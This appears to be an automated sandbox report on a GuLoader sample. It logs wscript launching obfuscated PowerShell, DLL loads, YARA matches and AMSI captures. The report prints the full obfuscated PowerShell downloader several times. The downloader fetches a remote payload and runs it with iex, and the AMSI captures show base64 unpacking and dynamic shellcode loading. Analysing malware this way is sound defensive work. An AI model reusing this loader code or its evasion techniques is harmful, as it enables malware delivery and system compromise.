Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Srbrns = 1;$Headling='Substrin';$Headling+='g';Function Fremtidsmuligheders($Elmiernflatable){$Uddannelsesafdelingerne=$Elmiernflatable.Length-$Srbrns;For($Elmier=5; $Elmier -lt $Uddannelsesafdelingerne; $Elmier+=(6)){$Undepreciative+=$Elmiernflatable.$Headling.Invoke($Elmier, $Srbrns);}$Undepreciative;}function Udslyngende($barm){& ($deforming) ($barm);}$Paviour=Fremtidsmuligheders ' ThemMBentjoTumulz couninonbilSo erl KonnaHelss/ Mus.5Maegl.Journ0Enlac Ci r(vesp,W MoriiPhthon AnoddKejs,oanal wDawttsEnkel EmascNSe,icT Reof Optim1Kanal0Nac o.Eviln0 Cohe;Biote restWAn,stiBagtandigam6 nse4Teleo;Exist Labox f,sk6 mas,4ukoll;Sinus Cinqur ,ntrvPtafi:Insta1H log2 Fals1 Dehu.D nsk0Photo)Konfo S,igmG KlbbeMiljicHjr,mkVievaomacro/.ring2 Rute0Tyngd1Iagtt0Twirl0Afste1Storm0Termo1Hors. SnrehFNucleiPopparYe,hoewifehfTaranoC.araxThy s/ar en1Abave2 orsi1Ikono.Dotti0Wordi ';$Presserendes=Fremtidsmuligheders ',pittUPrcissTimiaeCharmrSau.e- UtakAp ocrgItureealbifnCon,it avyt ';$Hustankes=Fremtidsmuligheders ' TephhRund tFootbtLim,sp Glyp:Respe/Regie/NegatoA.stir.ameliScurvgsammeiUngrinCheeraS,ruplFejlhcProlooDgnaanOsmogc riveFil,hpPe att Nyh,skonsoiT,iumnSuniocSmu t.Cerv.r nsinulo.us.CompucBacksoKogejmH.sge/ uswiaopsens .rked.ompltSpi e/ProjeKLevera DagsrSkraadCombiiImagon TritaBarsel SubgiForbitflocceFor.rtNeedee domiradver.OpsnupDebugfSkabeb saer ';$Agricolous=Fremtidsmuligheders '.onke>Sorts ';$deforming=Fremtidsmuligheders ',mpudiRevereGobsmxabbre ';$Befrogged = Fremtidsmuligheders 'Bas.geEtiolc PlanhParaloOlier flapp%Solsya.torip Catep D,owdSubc aBgerbtStrenaIng.n%Skiin\AsparBLikvieNebran Sta,zSengei AnthdTvangi.skarnT.lgaeSpids2Stro 3 econ3Ski d. GrosSCamoujC,terlProra Smok&Curta&Dipsa Afsjle Af uc ntomh kraoSalam Dephl$Frugt ';Udslyngende (Fremtidsmuligheders 'Panto$treergModiflCel,sokermab Kar a Bolil issa: kvalMFilmfa.niveu ilmer H,meeAric rAde onKodake Un,e= Folk(KraftcGilbemPerpedMadre lifto/ Mo ocPatho Kalkv$No,psBhappeeKanaefHalobr fnugoUnriggKlassgUn.areBygnid Fleu) Re i ');Udslyngende (Fremtidsmuligheders 'f.aar$ akshgEctoglRavinoOpr,jbangusaDe orlMaler:A mrkC.ltrahDrawaaDatelrM.rblmCo.che AarsuGrayfsNsk,beBeds rneighnNeuroe ApossIndda=U.kla$FredsHThumbuBombesPyromt P,rtaSprinnJounckBedeaeTilsysPalin.Dagmas.enoppHippalgr seiBefritJernb(Op,as$Sk,inACara.gDun erK,eolis ocucChiroo VililB.itooPi,peuOcells.ntar) Bu.c ');$Hustankes=$Charmeusernes[0];Udslyngende (Fremtidsmuligheders 'Scrof$UtopigNephrl Tan,oV.ndfb ,pomaBeakel.upli:TudbrR SelvoPyntetOverca NondtGuariiForsko Ann,n Da nsAll vp By nuBeatmmwholep B ggeZost,r.muldnDubioeContisLigul1Elect0Sto.e1 Jumi=Bar.kNBestoeSkinkw,aabe-Up.elOSkrmab Rij,j Intee PollcSpatut Cobw explaSPowdeyPres,sExcitt RosaeFo esmAllor.AfbinNScraneSpec.t Faun.AntipWKemikeBekl.bKyndeCem,lslMal xiMensteUndown S.rntM,tab ');Udslyngende (Fremtidsmuligheders ' asm$PeaseRCham oColoutDialeaViewitO Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Benzidine233.Sjl && echo $" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Srbrns = 1;$Headling='Substrin';$Headling+='g';Function Fremtidsmuligheders($Elmiernflatable){$Uddannelsesafdelingerne=$Elmiernflatable.Length-$Srbrns;For($Elmier=5; $Elmier -lt $Uddannelsesafdelingerne; $Elmier+=(6)){$Undepreciative+=$Elmiernflatable.$Headling.Invoke($Elmier, $Srbrns);}$Undepreciative;}function Udslyngende($barm){& ($deforming) ($barm);}$Paviour=Fremtidsmuligheders ' ThemMBentjoTumulz couninonbilSo erl KonnaHelss/ Mus.5Maegl.Journ0Enlac Ci r(vesp,W MoriiPhthon AnoddKejs,oanal wDawttsEnkel EmascNSe,icT Reof Optim1Kanal0Nac o.Eviln0 Cohe;Biote restWAn,stiBagtandigam6 nse4Teleo;Exist Labox f,sk6 mas,4ukoll;Sinus Cinqur ,ntrvPtafi:Insta1H log2 Fals1 Dehu.D nsk0Photo)Konfo S,igmG KlbbeMiljicHjr,mkVievaomacro/.ring2 Rute0Tyngd1Iagtt0Twirl0Afste1Storm0Termo1Hors. SnrehFNucleiPopparYe,hoewifehfTaranoC.araxThy s/ar en1Abave2 orsi1Ikono.Dotti0Wordi ';$Presserendes=Fremtidsmuligheders ',pittUPrcissTimiaeCharmrSau.e- UtakAp ocrgItureealbifnCon,it avyt ';$Hustankes=Fremtidsmuligheders ' TephhRund tFootbtLim,sp Glyp:Respe/Regie/NegatoA.stir.ameliScurvgsammeiUngrinCheeraS,ruplFejlhcProlooDgnaanOsmogc riveFil,hpPe att Nyh,skonsoiT,iumnSuniocSmu t.Cerv.r nsinulo.us.CompucBacksoKogejmH.sge/ uswiaopsens .rked.ompltSpi e/ProjeKLevera DagsrSkraadCombiiImagon TritaBarsel SubgiForbitflocceFor.rtNeedee domiradver.OpsnupDebugfSkabeb saer ';$Agricolous=Fremtidsmuligheders '.onke>Sorts ';$deforming=Fremtidsmuligheders ',mpudiRevereGobsmxabbre ';$Befrogged = Fremtidsmuligheders 'Bas.geEtiolc PlanhParaloOlier flapp%Solsya.torip Catep D,owdSubc aBgerbtStrenaIng.n%Skiin\AsparBLikvieNebran Sta,zSengei AnthdTvangi.skarnT.lgaeSpids2Stro 3 econ3Ski d. GrosSCamoujC,terlProra Smok&Curta&Dipsa Afsjle Af uc ntomh kraoSalam Dephl$Frugt ';Udslyngende (Fremtidsmuligheders 'Panto$treergModiflCel,sokermab Kar a Bolil issa: kvalMFilmfa.niveu ilmer H,meeAric rAde onKodake Un,e= Folk(KraftcGilbemPerpedMadre lifto/ Mo ocPatho Kalkv$No,psBhappeeKanaefHalobr fnugoUnriggKlassgUn.areBygnid Fleu) Re i ');Udslyngende (Fremtidsmuligheders 'f.aar$ akshgEctoglRavinoOpr,jbangusaDe orlMaler:A mrkC.ltrahDrawaaDatelrM.rblmCo.che AarsuGrayfsNsk,beBeds rneighnNeuroe ApossIndda=U.kla$FredsHThumbuBombesPyromt P,rtaSprinnJounckBedeaeTilsysPalin.Dagmas.enoppHippalgr seiBefritJernb(Op,as$Sk,inACara.gDun erK,eolis ocucChiroo VililB.itooPi,peuOcells.ntar) Bu.c ');$Hustankes=$Charmeusernes[0];Udslyngende (Fremtidsmuligheders 'Scrof$UtopigNephrl Tan,oV.ndfb ,pomaBeakel.upli:TudbrR SelvoPyntetOverca NondtGuariiForsko Ann,n Da nsAll vp By nuBeatmmwholep B ggeZost,r.muldnDubioeContisLigul1Elect0Sto.e1 Jumi=Bar.kNBestoeSkinkw,aabe-Up.elOSkrmab Rij,j Intee PollcSpatut Cobw explaSPowdeyPres,sExcitt RosaeFo esmAllor.AfbinNScraneSpec.t Faun.AntipWKemikeBekl.bKyndeCem,lslMal xiMensteUndown S.rntM,tab ');Udslyngende (Fremtidsmuligheders ' asm$PeaseRCham oColoutDialeaViewitO Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Benzidine233.Sjl && echo $" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: System.Management.Automation.pdb-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000A.00000002.4119942643.0000000008889000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 0000000A.00000002.4119942643.0000000008889000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: stem.Core.pdb* source: powershell.exe, 0000000A.00000002.4119415851.0000000008820000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("POWERSHELL "$Srbrns = 1;$Headling='Substrin';$Headling+='g';Function Fremtidsmuligheders($Elmiernflatable){$Uddan", "0")
Yara detected GuLoader
Source: Yara match File source: 0000000A.00000002.4121086885.0000000009D38000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.4098203498.0000000005EC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.4120919409.0000000008AF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4185249372.000002449A046000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Forestries)$global:Zantewood = [System.Text.Encoding]::ASCII.GetString($Seniorstipendiats)$global:Gelatinizing192=$Zantewood.substring(295986,30428)<#Psychophobia Abdicable Clypeastr
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Curacaoerne $Ciphered $Pladsholderes), (Survigrous @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Eradiating = [AppDomain]::CurrentDomain.GetAssemblies()$
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Clasp)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Transformatorstationerne, $false).DefineType($Sybar
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Forestries)$global:Zantewood = [System.Text.Encoding]::ASCII.GetString($Seniorstipendiats)$global:Gelatinizing192=$Zantewood.substring(295986,30428)<#Psychophobia Abdicable Clypeastr
Suspicious powershell command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Srbrns = 1;$Headling='Substrin';$Headling+='g';Function Fremtidsmuligheders($Elmiernflatable){$Uddannelsesafdelingerne=$Elmiernflatable.Length-$Srbrns;For($Elmier=5; $Elmier -lt $Uddannelsesafdelingerne; $Elmier+=(6)){$Undepreciative+=$Elmiernflatable.$Headling.Invoke($Elmier, $Srbrns);}$Undepreciative;}function Udslyngende($barm){& ($deforming) ($barm);}$Paviour=Fremtidsmuligheders ' ThemMBentjoTumulz couninonbilSo erl KonnaHelss/ Mus.5Maegl.Journ0Enlac Ci r(vesp,W MoriiPhthon AnoddKejs,oanal wDawttsEnkel EmascNSe,icT Reof Optim1Kanal0Nac o.Eviln0 Cohe;Biote restWAn,stiBagtandigam6 nse4Teleo;Exist Labox f,sk6 mas,4ukoll;Sinus Cinqur ,ntrvPtafi:Insta1H log2 Fals1 Dehu.D nsk0Photo)Konfo S,igmG KlbbeMiljicHjr,mkVievaomacro/.ring2 Rute0Tyngd1Iagtt0Twirl0Afste1Storm0Termo1Hors. SnrehFNucleiPopparYe,hoewifehfTaranoC.araxThy s/ar en1Abave2 orsi1Ikono.Dotti0Wordi ';$Presserendes=Fremtidsmuligheders ',pittUPrcissTimiaeCharmrSau.e- UtakAp ocrgItureealbifnCon,it avyt ';$Hustankes=Fremtidsmuligheders ' TephhRund tFootbtLim,sp Glyp:Respe/Regie/NegatoA.stir.ameliScurvgsammeiUngrinCheeraS,ruplFejlhcProlooDgnaanOsmogc riveFil,hpPe att Nyh,skonsoiT,iumnSuniocSmu t.Cerv.r nsinulo.us.CompucBacksoKogejmH.sge/ uswiaopsens .rked.ompltSpi e/ProjeKLevera DagsrSkraadCombiiImagon TritaBarsel SubgiForbitflocceFor.rtNeedee domiradver.OpsnupDebugfSkabeb saer ';$Agricolous=Fremtidsmuligheders '.onke>Sorts ';$deforming=Fremtidsmuligheders ',mpudiRevereGobsmxabbre ';$Befrogged = Fremtidsmuligheders 'Bas.geEtiolc PlanhParaloOlier flapp%Solsya.torip Catep D,owdSubc aBgerbtStrenaIng.n%Skiin\AsparBLikvieNebran Sta,zSengei AnthdTvangi.skarnT.lgaeSpids2Stro 3 econ3Ski d. GrosSCamoujC,terlProra Smok&Curta&Dipsa Afsjle Af uc ntomh kraoSalam Dephl$Frugt ';Udslyngende (Fremtidsmuligheders 'Panto$treergModiflCel,sokermab Kar a Bolil issa: kvalMFilmfa.niveu ilmer H,meeAric rAde onKodake Un,e= Folk(KraftcGilbemPerpedMadre lifto/ Mo ocPatho Kalkv$No,psBhappeeKanaefHalobr fnugoUnriggKlassgUn.areBygnid Fleu) Re i ');Udslyngende (Fremtidsmuligheders 'f.aar$ akshgEctoglRavinoOpr,jbangusaDe orlMaler:A mrkC.ltrahDrawaaDatelrM.rblmCo.che AarsuGrayfsNsk,beBeds rneighnNeuroe ApossIndda=U.kla$FredsHThumbuBombesPyromt P,rtaSprinnJounckBedeaeTilsysPalin.Dagmas.enoppHippalgr seiBefritJernb(Op,as$Sk,inACara.gDun erK,eolis ocucChiroo VililB.itooPi,peuOcells.ntar) Bu.c ');$Hustankes=$Charmeusernes[0];Udslyngende (Fremtidsmuligheders 'Scrof$UtopigNephrl Tan,oV.ndfb ,pomaBeakel.upli:TudbrR SelvoPyntetOverca NondtGuariiForsko Ann,n Da nsAll vp By nuBeatmmwholep B ggeZost,r.muldnDubioeContisLigul1Elect0Sto.e1 Jumi=Bar.kNBestoeSkinkw,aabe-Up.elOSkrmab Rij,j Intee PollcSpatut Cobw explaSPowdeyPres,sExcitt RosaeFo esmAllor.AfbinNScraneSpec.t Faun.AntipWKemikeBekl.bKyndeCem,lslMal xiMensteUndown S.rntM,tab ');Udslyngende (Fremtidsmuligheders ' asm$PeaseRCham oColoutDialeaViewitO
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Srbrns = 1;$Headling='Substrin';$Headling+='g';Function Fremtidsmuligheders($Elmiernflatable){$Uddannelsesafdelingerne=$Elmiernflatable.Length-$Srbrns;For($Elmier=5; $Elmier -lt $Uddannelsesafdelingerne; $Elmier+=(6)){$Undepreciative+=$Elmiernflatable.$Headling.Invoke($Elmier, $Srbrns);}$Undepreciative;}function Udslyngende($barm){& ($deforming) ($barm);}$Paviour=Fremtidsmuligheders ' ThemMBentjoTumulz couninonbilSo erl KonnaHelss/ Mus.5Maegl.Journ0Enlac Ci r(vesp,W MoriiPhthon AnoddKejs,oanal wDawttsEnkel EmascNSe,icT Reof Optim1Kanal0Nac o.Eviln0 Cohe;Biote restWAn,stiBagtandigam6 nse4Teleo;Exist Labox f,sk6 mas,4ukoll;Sinus Cinqur ,ntrvPtafi:Insta1H log2 Fals1 Dehu.D nsk0Photo)Konfo S,igmG KlbbeMiljicHjr,mkVievaomacro/.ring2 Rute0Tyngd1Iagtt0Twirl0Afste1Storm0Termo1Hors. SnrehFNucleiPopparYe,hoewifehfTaranoC.araxThy s/ar en1Abave2 orsi1Ikono.Dotti0Wordi ';$Presserendes=Fremtidsmuligheders ',pittUPrcissTimiaeCharmrSau.e- UtakAp ocrgItureealbifnCon,it avyt ';$Hustankes=Fremtidsmuligheders ' TephhRund tFootbtLim,sp Glyp:Respe/Regie/NegatoA.stir.ameliScurvgsammeiUngrinCheeraS,ruplFejlhcProlooDgnaanOsmogc riveFil,hpPe att Nyh,skonsoiT,iumnSuniocSmu t.Cerv.r nsinulo.us.CompucBacksoKogejmH.sge/ uswiaopsens .rked.ompltSpi e/ProjeKLevera DagsrSkraadCombiiImagon TritaBarsel SubgiForbitflocceFor.rtNeedee domiradver.OpsnupDebugfSkabeb saer ';$Agricolous=Fremtidsmuligheders '.onke>Sorts ';$deforming=Fremtidsmuligheders ',mpudiRevereGobsmxabbre ';$Befrogged = Fremtidsmuligheders 'Bas.geEtiolc PlanhParaloOlier flapp%Solsya.torip Catep D,owdSubc aBgerbtStrenaIng.n%Skiin\AsparBLikvieNebran Sta,zSengei 